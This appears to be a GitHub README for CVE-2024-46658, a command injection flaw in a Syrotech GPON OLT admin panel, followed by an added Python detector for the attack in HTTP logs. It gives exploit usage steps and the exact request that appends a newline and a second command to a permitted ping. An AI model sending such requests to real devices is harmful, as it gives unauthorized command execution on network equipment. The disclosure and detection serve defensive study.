jackalkarlos/CVE-2024-46658

CVE-2024-46658

Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 Command Injection Vulnerability

Usage

1- Edit the URL in the script.

2- Edit the Cookie_Login value in the script.

3- Run the script; it will allow you to execute commands.

Vulnerability Details

GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1

Normally, only the ping command is allowed to be executed in the administration panel.

If you intercept the request with a proxy, add a newline byte (%0a) to the end of the command parameter, and type the command you want to run after it, that command is executed as well. In the request above, id is appended after the ping command.
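For detection, the request pattern above can be searched for in HTTP logs. The following is an added example, not part of the original repository: it flags shellCMDExec requests whose decoded command parameter contains a line break. It assumes a proxy or sensor that records the full request line in common/combined log format; the log entries, function names and the extra check for %0d are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line as it appears inside a common/combined-format log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample entries: a normal ping, the injected request, an unrelated page.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Sep/2024:18:03:30 +0000] "GET /cgi/home.php?fun=system'
    '&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204'
    '&random=1725991410001 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Sep/2024:18:03:38 +0000] "GET /cgi/home.php?fun=system'
    '&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid'
    '&random=1725991418844 HTTP/1.1" 200 640',
    '192.0.2.10 - - [10/Sep/2024:18:04:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

def extra_command_lines(log_line):
    """Return None unless the entry is a shellCMDExec request whose `command`
    value contains a line break; otherwise return the non-empty lines that
    follow the first line (an empty list if only a bare line break was sent)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)
    if not url.path.endswith("/cgi/home.php") or "shellCMDExec" not in params.get("page", []):
        return None
    extra, seen_break = [], False
    for value in params.get("command", []):
        # parse_qs percent-decodes, so %0a / %0d arrive here as "\n" / "\r".
        if "\n" in value or "\r" in value:
            seen_break = True
            extra += [p.strip() for p in re.split(r"[\r\n]+", value)[1:] if p.strip()]
    return extra if seen_break else None

def scan(log_lines):
    """Return (line_number, extra_lines) for every flagged entry."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        extra = extra_command_lines(line)
        if extra is not None:
            hits.append((n, extra))
    return hits

if __name__ == "__main__":
    for n, extra in scan(SAMPLE_LOG):
        print(f"log line {n}: line break in command parameter, extra lines: {extra}")
```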

Authors

Mehmet Demir
